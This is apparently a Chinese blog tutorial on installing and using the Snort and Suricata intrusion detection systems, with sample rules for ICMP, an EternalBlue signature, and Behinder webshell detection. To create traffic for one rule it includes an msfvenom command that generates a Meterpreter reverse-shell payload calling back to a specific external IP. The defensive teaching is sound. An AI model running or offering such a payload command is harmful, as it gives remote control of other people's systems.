战前溯源反制--IDS+IPS-->Snort&Suricata&打包系统

于 2024-07-12 15:11:24 发布
阅读量547 收藏 12
点赞数 25
分类专栏: # 应急响应 文章标签: 数据库 网络 服务器 网络安全 安全架构 大数据 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/140379888
版权

🎼个人主页:金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

 

目录

snort

snort项目官网:

snort安装教程:

规则写法参考&参数解析:

自写规则--使用

suricata 

suricata项目

Suricata规则下载

手册

快速安装

测试--使用

打包系统:securityonion

snort

snort项目官网:

这个项目还是vip香...

Snort - Network Intrusion Detection & Prevention System

snort安装教程:

snort2/snort3:

最新Snort3和Snort2安装详细教程

GitHub - snort3/snort3: Snort++

快速安装:
apt install snort

规则写法参考&参数解析:

配置文件,规则写法,使用参数 https://www.cnblogs.com/yuersan/p/15236326.html Snort运行命令中文版_snort命令-CSDN博客 Snort的使用二:入侵检测与规则编写_snort规则的应用-CSDN博客

Snort的安装与使用_snort使用教程-CSDN博客

自写规则--使用

1、ICMP 协议警告-协议 
snort -i eth0 -c /etc/snort/snort.conf -A fast -l /var/log/snort 
--监听
定义规则监听:
alert icmp any any -> any any (msg:"ICMP test"; gid:1;sid:10000001;rev:1;) 
​
--配置文件
-l 保存到...
任意来,去
====
2、MSF 后门警告-端口 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7799 -f elf >7799.elf 
​
my.rules 
include $RULE_PATH/my.rules 
snort -i eth0 -c /etc/snort/snort.conf -A fast -l /var/log/snort 
alert tcp any 7799 -> any any (msg:"SNORT:visit destport tcp 7799"; sid:201900001; rev:1;) 
====
3、识别永恒之蓝-特征 
alert smb any any -> $HOME_NET any (msg:“ET EXPLOIT Possible ETERNALBLUE MS17-010”; flow:to_server,established; content:”|00 
00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; 
fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; 
distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

suricata 

suricata项目

GitHub - OISF/suricata: Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.

Suricata规则下载

GitHub - ptresearch/AttackDetection: Attack Detection

GitHub - al0ne/suricata-rules: Suricata IDS rules 用来检测红队渗透/恶意行为等,支持检测CobaltStrike/MSF/Empire/DNS隧道/Weevely/菜刀/冰蝎/挖矿/反弹shell/ICMP隧道等 GitHub - ptresearch/AttackDetection: Attack Detection

手册

Suricata User Guide — Suricata 8.0.0-dev documentation

快速安装

apt-get install suricata

测试--使用

1.检测漏洞攻击:MS17010 
suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/wannamine.rules 
                 suricata绝对路径           网卡                  指向的规则文件(.rules)
--监控开启
=================================
触发--->--查看日志--发现
cat /var/log/suricata/fast.log
日志目录: /var/log/--
=================================
--访问就触发规则
(捕获所有网卡(交换机)下的流量)
​
​
​
2.检测冰蝎后门:
Behinder_v3.0_Beta_6_win 项目         --规则
​
---------部署到交换机下,所有网络的出口
​
新版本没有提示--规则要与版本一样呀
​
​
检测冰蝎后门:SHELL.PHP
suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/Behinder3.rules
cat /var/log/suricata/fast.log
​
=====================================================================================
版本  规则

 

打包系统:securityonion

集成snort/suricata、bro(zeek)、elk、ossec等 Security Onion Solutions

金灰
关注
  • 25
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
IDS入侵检测系统与开源IDS-snort的安装与编写规则
weixin_64655821的博客
10-01 3778
IDS入侵检测系统与开源IDS-snort的安装与编写规则
ubuntu snort-mysql_Ubuntu 16.04 搭建Snort
weixin_39755824的博客
02-11 268
一、介绍Snort是一套开源的网络入侵检测系统(NIDS),主要功能有包嗅探、包记录和入侵检测功能。Snort能够对网络上的数据包进行抓包分析,但区别于其它嗅探器的是,它能根据所定义的规则进行响应及处理。Snort 通过对获取的数据包,进行各规则的分析后,根据规则链,可采取Activation(报警并启动另外一个动态规则链)、Dynamic(由其它的规则包调用)、Alert(报警),Pass(忽略...
溯源反制-IDS&IPS-Suricata/Snort
m0_62172162的博客
04-26 613
溯源反制-IDS&IPS-Suricata/Snort
朔源反制IDS IPS snort suricata
wuqingsix的博客
02-19 123
IDS:Intrusion detection systems 入侵检测系统IPS:Intrusion prevention systems 入侵防御系统
ubuntu snort-mysql_如何在Ubuntu上安装Snort入侵检测系统
weixin_39524959的博客
01-29 475
Snort作为一款优秀的开源主机入侵检测系统,在windows和Linux平台上均可安装运行。Ubuntu作为一个以桌面应用为主的Linux操作系统,同样也可以安装Snort。安装Snort过程[安装LAMP,Snort和一些软件库]由于 Ubuntu 是 Debian 系的 Linux,安装软件非常简单,而且 Ubuntu在中国科技大学有镜像,在教育网和科技网下载速度非常快(2~6M/s),就省...
Ubuntu server 24 (Linux) Snort3 3.2.1.0 Guardian IPtables 联动实战 主动防御系统(ids+ips)
tonyhi6的博客
05-31 954
snort+guard+iptables 实战联动测试。二 安装主动防御程序Guardian。2 另外一台主机上测试ping 测试。1 查看Iptables 表。3 guardian启动。
基于wireshark打造安全分析师工具--解析suricata中的分析结果
村中少年的专栏
06-04 628
基于wireshark结合suricata的分析结果直接在wireshark UI上给出数据包中的攻击手段分析
ubuntu snort-mysql_在ubuntu下安装snort
weixin_30840919的博客
01-29 295
-----------这个安装完了有很多问题,最终还是在windows下面安装snort的,很方便,大家可以试一试---------------Snort作为一款优秀的开源主机入侵检测系统,在windows和Linux平台上均可安装运行。Ubuntu作为一个以桌面应用为主的Linux操作系统,同样也可以安装Snort。安装Snort过程[安装LAMP,Snort和一些软件库]由于 Ubuntu 是...
Suricata/Snort规则参考
HoloLens的博客
08-21 4360
Suricata/Snort规则参考 文章目录Suricata/Snort规则参考限制优势6. Suricata 规则6.1. 规则格式6.1.1. 动作(Action)6.1.2. 协议(Protocol)6.1.3. 源和目的(Source and destination)6.1.4. 端口(Source and destination)6.1.5. 方向(Direction)6.1.6. 规则选项(Rule options)6.1.6.1. 修饰器关键词(Modifier Keywords)6.1.6
配置篇-suricata.yaml-1
superbfly的专栏
10-18 2258
suricata版本为4.0.3 user and group 用于设置启动suricata的用户及其分组。 # Run suricata as user and group. # run-as: # user: suri # group: suri max-pending-packets 该选项设置了suricata能够同时处理的数据包的数量,最少为1,最大值取决于内存的大小,...
Snort-IPS-IDS:包含所有带有“删除”规则的snort配置
05-16
Snort是一款开源网络入侵检测系统(NIDS)和入侵防御系统IPS),它能够实时监控网络流量,识别潜在的攻击行为。在这个特定的压缩包文件"Snort-IPS-IDS"中,重点在于包含了所有与"删除"规则相关的Snort配置。这表明...
ids-machine-learning:基于机器学习技术的IDS
02-04
ids机器学习 创建虚拟环境 pip install virtualenv virtualenv env 活动和安装软件包 source env/bin/activate pip install -r requirements.txt 跑 建立KMeans集群并测试准确性 python main.py ./flatc --python ...
Snort-Rules:Snort 23条规则的集合
05-11
Snort规则 描述 Snort 2和3规则很不错。 包括社区版和另一个Github存储库的快照克隆。 喷鼻息2 为了易于使用,该存储库已存储在snortrules-snapshot-2972.zip中。 还有公共版本的snort2-community-rules.tar。 喷...
py-idstools:idstools
05-01
py-ids工具 py-idstools是用于IDS系统(通常是SnortSuricata)的Python库的集合。包含程序rulecat-Suricata基本规则管理工具,适合替代Oinkmaster和Pulled Pork。 eve2pcap-将eve日志中的数据包和有效负载转换为...
snort-rules:Snort规则(IDS规则)的非官方Git存储库发布
05-07
Snort.org Talos规则 Snort Rules(R)的非官方Git存储库从发布规则 新兴威胁规则 滥用规则 来自规则 积极技术的攻击检测 来自规则 其他规定 如果您喜欢这个仓库,请留下星星! 随着时间的推移观星人
初始C++
2302_81016149的博客
07-08 779
在C语言我们学习函数的时候,我们学习过生命周期这个概念。那么,什么是生命周期呢?生命周期通常指的是一个对象或变量从创建到销毁所经历的时间段。那么,命名空间是什么?咱们可以这样理解:在这个空间的生命周期内,对这个空间内的全部标识符起一个名字,可对其进行引用,可类似与C语言中的结构体。#include<stdlib.h>//此处不包此头文件代码可正常运行,那该如何解决此处情况呢?int main()//此处编译不通过原因为:在不包头文件前为变量,包含后为函数。return 0;
JDBC (基础)
weixin_51644244的博客
07-07 385
思考: java和sql是两种不同的编程语言。翻译程序---每个数据库厂商都提高了翻译软件-- -打包jar。---我们的java代码引入jar就可完成与数据库的沟通。Java :OOP 面向对象的编程对象。SQL: 结构化查询语言
系统架构设计师教程 第二章 计算机系统基础知识-2.3计算机软件
最新发布
Remon的专栏
07-09 707
系统架构设计师教程》清华第二版 2.3计算机软件 章节的详细解读
Java:使用synchronized和Redis实现并发控制的区别
好幸运
07-08 436
而Redis则适用于分布式环境下的同步需求,虽然操作相对复杂,但它能够解决跨JVM的资源竞争问题。: 是Java语言内置的关键字,用于实现线程间的同步。这种同步是** JVM层面**的,对本地内存中的对象进行操作。Redis: 由于是基于网络通信的分布式存储,它的性能受到网络延迟和带宽的影响。然而,在分布式环境下,Redis提供的分布式锁机制能够有效解决跨JVM的同步问题,尽管相比。Redis: 使用Redis实现同步(如通过SETNX命令设置锁),需要手动编写代码来获取和释放锁。
11-2019051121-林晓旭-SNORT入侵检测系统1
08-08
2. 预处理综述预处理器在调用检测引擎之前,在数据包被解码之后运行 1. snort主要选项参数-A<alert>设置报警方式为full,fast或者none

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值